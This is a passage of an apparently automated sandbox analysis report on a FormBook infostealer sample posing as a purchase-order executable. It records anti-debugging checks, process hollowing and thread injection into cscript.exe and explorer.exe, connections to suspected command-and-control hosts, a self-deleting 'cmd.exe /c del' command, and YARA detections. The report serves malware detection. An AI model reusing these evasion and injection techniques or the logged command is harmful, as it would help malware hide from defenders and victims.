          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535BC2C mov eax, dword ptr fs:[00000030h]16_2_0535BC2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6C0A mov eax, dword ptr fs:[00000030h]16_2_053A6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6C0A mov eax, dword ptr fs:[00000030h]16_2_053A6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6C0A mov eax, dword ptr fs:[00000030h]16_2_053A6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6C0A mov eax, dword ptr fs:[00000030h]16_2_053A6C0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F740D mov eax, dword ptr fs:[00000030h]16_2_053F740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F740D mov eax, dword ptr fs:[00000030h]16_2_053F740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F740D mov eax, dword ptr fs:[00000030h]16_2_053F740D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1C06 mov eax, dword ptr fs:[00000030h]16_2_053E1C06
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534746D mov eax, dword ptr fs:[00000030h]16_2_0534746D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BC450 mov eax, dword ptr fs:[00000030h]16_2_053BC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BC450 mov eax, dword ptr fs:[00000030h]16_2_053BC450
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A44B mov eax, dword ptr fs:[00000030h]16_2_0535A44B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533849B mov eax, dword ptr fs:[00000030h]16_2_0533849B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E14FB mov eax, dword ptr fs:[00000030h]16_2_053E14FB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6CF0 mov eax, dword ptr fs:[00000030h]16_2_053A6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6CF0 mov eax, dword ptr fs:[00000030h]16_2_053A6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A6CF0 mov eax, dword ptr fs:[00000030h]16_2_053A6CF0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F8CD6 mov eax, dword ptr fs:[00000030h]16_2_053F8CD6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535E730 mov eax, dword ptr fs:[00000030h]16_2_0535E730
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05324F2E mov eax, dword ptr fs:[00000030h]16_2_05324F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05324F2E mov eax, dword ptr fs:[00000030h]16_2_05324F2E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534F716 mov eax, dword ptr fs:[00000030h]16_2_0534F716
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BFF10 mov eax, dword ptr fs:[00000030h]16_2_053BFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BFF10 mov eax, dword ptr fs:[00000030h]16_2_053BFF10
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F070D mov eax, dword ptr fs:[00000030h]16_2_053F070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F070D mov eax, dword ptr fs:[00000030h]16_2_053F070D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A70E mov eax, dword ptr fs:[00000030h]16_2_0535A70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A70E mov eax, dword ptr fs:[00000030h]16_2_0535A70E
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533FF60 mov eax, dword ptr fs:[00000030h]16_2_0533FF60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F8F6A mov eax, dword ptr fs:[00000030h]16_2_053F8F6A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533EF40 mov eax, dword ptr fs:[00000030h]16_2_0533EF40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05338794 mov eax, dword ptr fs:[00000030h]16_2_05338794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A7794 mov eax, dword ptr fs:[00000030h]16_2_053A7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A7794 mov eax, dword ptr fs:[00000030h]16_2_053A7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A7794 mov eax, dword ptr fs:[00000030h]16_2_053A7794
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053637F5 mov eax, dword ptr fs:[00000030h]16_2_053637F5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053DFE3F mov eax, dword ptr fs:[00000030h]16_2_053DFE3F
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532E620 mov eax, dword ptr fs:[00000030h]16_2_0532E620
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A61C mov eax, dword ptr fs:[00000030h]16_2_0535A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A61C mov eax, dword ptr fs:[00000030h]16_2_0535A61C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532C600 mov eax, dword ptr fs:[00000030h]16_2_0532C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532C600 mov eax, dword ptr fs:[00000030h]16_2_0532C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532C600 mov eax, dword ptr fs:[00000030h]16_2_0532C600
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05358E00 mov eax, dword ptr fs:[00000030h]16_2_05358E00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E1608 mov eax, dword ptr fs:[00000030h]16_2_053E1608
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AE73 mov eax, dword ptr fs:[00000030h]16_2_0534AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AE73 mov eax, dword ptr fs:[00000030h]16_2_0534AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AE73 mov eax, dword ptr fs:[00000030h]16_2_0534AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AE73 mov eax, dword ptr fs:[00000030h]16_2_0534AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534AE73 mov eax, dword ptr fs:[00000030h]16_2_0534AE73
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533766D mov eax, dword ptr fs:[00000030h]16_2_0533766D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05337E41 mov eax, dword ptr fs:[00000030h]16_2_05337E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05337E41 mov eax, dword ptr fs:[00000030h]16_2_05337E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05337E41 mov eax, dword ptr fs:[00000030h]16_2_05337E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05337E41 mov eax, dword ptr fs:[00000030h]16_2_05337E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05337E41 mov eax, dword ptr fs:[00000030h]16_2_05337E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05337E41 mov eax, dword ptr fs:[00000030h]16_2_05337E41
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EAE44 mov eax, dword ptr fs:[00000030h]16_2_053EAE44
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053EAE44 mov eax, dword ptr fs:[00000030h]16_2_053EAE44
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F0EA5 mov eax, dword ptr fs:[00000030h]16_2_053F0EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F0EA5 mov eax, dword ptr fs:[00000030h]16_2_053F0EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F0EA5 mov eax, dword ptr fs:[00000030h]16_2_053F0EA5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A46A7 mov eax, dword ptr fs:[00000030h]16_2_053A46A7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BFE87 mov eax, dword ptr fs:[00000030h]16_2_053BFE87
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053376E2 mov eax, dword ptr fs:[00000030h]16_2_053376E2
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053516E0 mov ecx, dword ptr fs:[00000030h]16_2_053516E0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F8ED6 mov eax, dword ptr fs:[00000030h]16_2_053F8ED6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05368EC7 mov eax, dword ptr fs:[00000030h]16_2_05368EC7
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053536CC mov eax, dword ptr fs:[00000030h]16_2_053536CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053DFEC0 mov eax, dword ptr fs:[00000030h]16_2_053DFEC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535513A mov eax, dword ptr fs:[00000030h]16_2_0535513A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535513A mov eax, dword ptr fs:[00000030h]16_2_0535513A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05344120 mov eax, dword ptr fs:[00000030h]16_2_05344120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05344120 mov eax, dword ptr fs:[00000030h]16_2_05344120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05344120 mov eax, dword ptr fs:[00000030h]16_2_05344120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05344120 mov eax, dword ptr fs:[00000030h]16_2_05344120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05344120 mov ecx, dword ptr fs:[00000030h]16_2_05344120
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05329100 mov eax, dword ptr fs:[00000030h]16_2_05329100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05329100 mov eax, dword ptr fs:[00000030h]16_2_05329100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05329100 mov eax, dword ptr fs:[00000030h]16_2_05329100
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532B171 mov eax, dword ptr fs:[00000030h]16_2_0532B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532B171 mov eax, dword ptr fs:[00000030h]16_2_0532B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532C962 mov eax, dword ptr fs:[00000030h]16_2_0532C962
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534B944 mov eax, dword ptr fs:[00000030h]16_2_0534B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534B944 mov eax, dword ptr fs:[00000030h]16_2_0534B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A51BE mov eax, dword ptr fs:[00000030h]16_2_053A51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A51BE mov eax, dword ptr fs:[00000030h]16_2_053A51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A51BE mov eax, dword ptr fs:[00000030h]16_2_053A51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A51BE mov eax, dword ptr fs:[00000030h]16_2_053A51BE
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov ecx, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov ecx, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov eax, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov ecx, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov ecx, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov eax, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov ecx, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov ecx, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov eax, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov ecx, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov ecx, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053499BF mov eax, dword ptr fs:[00000030h]16_2_053499BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053561A0 mov eax, dword ptr fs:[00000030h]16_2_053561A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053561A0 mov eax, dword ptr fs:[00000030h]16_2_053561A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E49A4 mov eax, dword ptr fs:[00000030h]16_2_053E49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E49A4 mov eax, dword ptr fs:[00000030h]16_2_053E49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E49A4 mov eax, dword ptr fs:[00000030h]16_2_053E49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E49A4 mov eax, dword ptr fs:[00000030h]16_2_053E49A4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A69A6 mov eax, dword ptr fs:[00000030h]16_2_053A69A6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05352990 mov eax, dword ptr fs:[00000030h]16_2_05352990
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535A185 mov eax, dword ptr fs:[00000030h]16_2_0535A185
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534C182 mov eax, dword ptr fs:[00000030h]16_2_0534C182
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053B41E8 mov eax, dword ptr fs:[00000030h]16_2_053B41E8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532B1E1 mov eax, dword ptr fs:[00000030h]16_2_0532B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532B1E1 mov eax, dword ptr fs:[00000030h]16_2_0532B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532B1E1 mov eax, dword ptr fs:[00000030h]16_2_0532B1E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534A830 mov eax, dword ptr fs:[00000030h]16_2_0534A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534A830 mov eax, dword ptr fs:[00000030h]16_2_0534A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534A830 mov eax, dword ptr fs:[00000030h]16_2_0534A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0534A830 mov eax, dword ptr fs:[00000030h]16_2_0534A830
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535002D mov eax, dword ptr fs:[00000030h]16_2_0535002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535002D mov eax, dword ptr fs:[00000030h]16_2_0535002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535002D mov eax, dword ptr fs:[00000030h]16_2_0535002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535002D mov eax, dword ptr fs:[00000030h]16_2_0535002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535002D mov eax, dword ptr fs:[00000030h]16_2_0535002D
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533B02A mov eax, dword ptr fs:[00000030h]16_2_0533B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533B02A mov eax, dword ptr fs:[00000030h]16_2_0533B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533B02A mov eax, dword ptr fs:[00000030h]16_2_0533B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0533B02A mov eax, dword ptr fs:[00000030h]16_2_0533B02A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F4015 mov eax, dword ptr fs:[00000030h]16_2_053F4015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F4015 mov eax, dword ptr fs:[00000030h]16_2_053F4015
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A7016 mov eax, dword ptr fs:[00000030h]16_2_053A7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A7016 mov eax, dword ptr fs:[00000030h]16_2_053A7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A7016 mov eax, dword ptr fs:[00000030h]16_2_053A7016
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F1074 mov eax, dword ptr fs:[00000030h]16_2_053F1074
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E2073 mov eax, dword ptr fs:[00000030h]16_2_053E2073
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05340050 mov eax, dword ptr fs:[00000030h]16_2_05340050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05340050 mov eax, dword ptr fs:[00000030h]16_2_05340050
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535F0BF mov ecx, dword ptr fs:[00000030h]16_2_0535F0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535F0BF mov eax, dword ptr fs:[00000030h]16_2_0535F0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0535F0BF mov eax, dword ptr fs:[00000030h]16_2_0535F0BF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053520A0 mov eax, dword ptr fs:[00000030h]16_2_053520A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053520A0 mov eax, dword ptr fs:[00000030h]16_2_053520A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053520A0 mov eax, dword ptr fs:[00000030h]16_2_053520A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053520A0 mov eax, dword ptr fs:[00000030h]16_2_053520A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053520A0 mov eax, dword ptr fs:[00000030h]16_2_053520A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053520A0 mov eax, dword ptr fs:[00000030h]16_2_053520A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053690AF mov eax, dword ptr fs:[00000030h]16_2_053690AF
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05329080 mov eax, dword ptr fs:[00000030h]16_2_05329080
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A3884 mov eax, dword ptr fs:[00000030h]16_2_053A3884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053A3884 mov eax, dword ptr fs:[00000030h]16_2_053A3884
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053240E1 mov eax, dword ptr fs:[00000030h]16_2_053240E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053240E1 mov eax, dword ptr fs:[00000030h]16_2_053240E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053240E1 mov eax, dword ptr fs:[00000030h]16_2_053240E1
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053258EC mov eax, dword ptr fs:[00000030h]16_2_053258EC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BB8D0 mov eax, dword ptr fs:[00000030h]16_2_053BB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BB8D0 mov ecx, dword ptr fs:[00000030h]16_2_053BB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BB8D0 mov eax, dword ptr fs:[00000030h]16_2_053BB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BB8D0 mov eax, dword ptr fs:[00000030h]16_2_053BB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BB8D0 mov eax, dword ptr fs:[00000030h]16_2_053BB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053BB8D0 mov eax, dword ptr fs:[00000030h]16_2_053BB8D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053E131B mov eax, dword ptr fs:[00000030h]16_2_053E131B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05353B7A mov eax, dword ptr fs:[00000030h]16_2_05353B7A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_05353B7A mov eax, dword ptr fs:[00000030h]16_2_05353B7A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532DB60 mov ecx, dword ptr fs:[00000030h]16_2_0532DB60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_053F8B58 mov eax, dword ptr fs:[00000030h]16_2_053F8B58
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0532F358 mov eax, dword ptr fs:[00000030h]16_2_0532F358
          Source: C:\Users\user\Desktop\PO 56720012359.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_00409B30 LdrLoadDll,3_2_00409B30
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B40F0 SetUnhandledExceptionFilter,1_2_008B40F0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B4121 SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_008B4121
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008B40F0 SetUnhandledExceptionFilter,3_2_008B40F0
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 3_2_008B4121 SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_008B4121

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 156.252.96.170 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.fmodesign.com
          Source: C:\Windows\explorer.exeDomain query: www.healthy-shack.com
          Source: C:\Windows\explorer.exeDomain query: www.arerasols.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.81.100.18 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 107.180.44.148 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.mobilewz.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.252.68.226 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.stuntfighting.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\PO 56720012359.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: 1210000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\PO 56720012359.exeSection loaded: unknown target: C:\Users\user\Desktop\PO 56720012359.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO 56720012359.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO 56720012359.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO 56720012359.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\PO 56720012359.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO 56720012359.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\PO 56720012359.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\PO 56720012359.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\PO 56720012359.exeProcess created: C:\Users\user\Desktop\PO 56720012359.exe 'C:\Users\user\Desktop\PO 56720012359.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO 56720012359.exe'Jump to behavior
          Source: explorer.exe, 00000005.00000000.314610609.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.509351340.0000000003BB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.314610609.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.509351340.0000000003BB0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.314610609.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.509351340.0000000003BB0000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000005.00000000.255386675.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000005.00000000.314610609.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.509351340.0000000003BB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000005.00000000.314610609.0000000001640000.00000002.00020000.sdmp, cscript.exe, 00000010.00000002.509351340.0000000003BB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B74BC cpuid 1_2_008B74BC
          Source: C:\Users\user\Desktop\PO 56720012359.exeCode function: 1_2_008B3A01 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_008B3A01

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORY
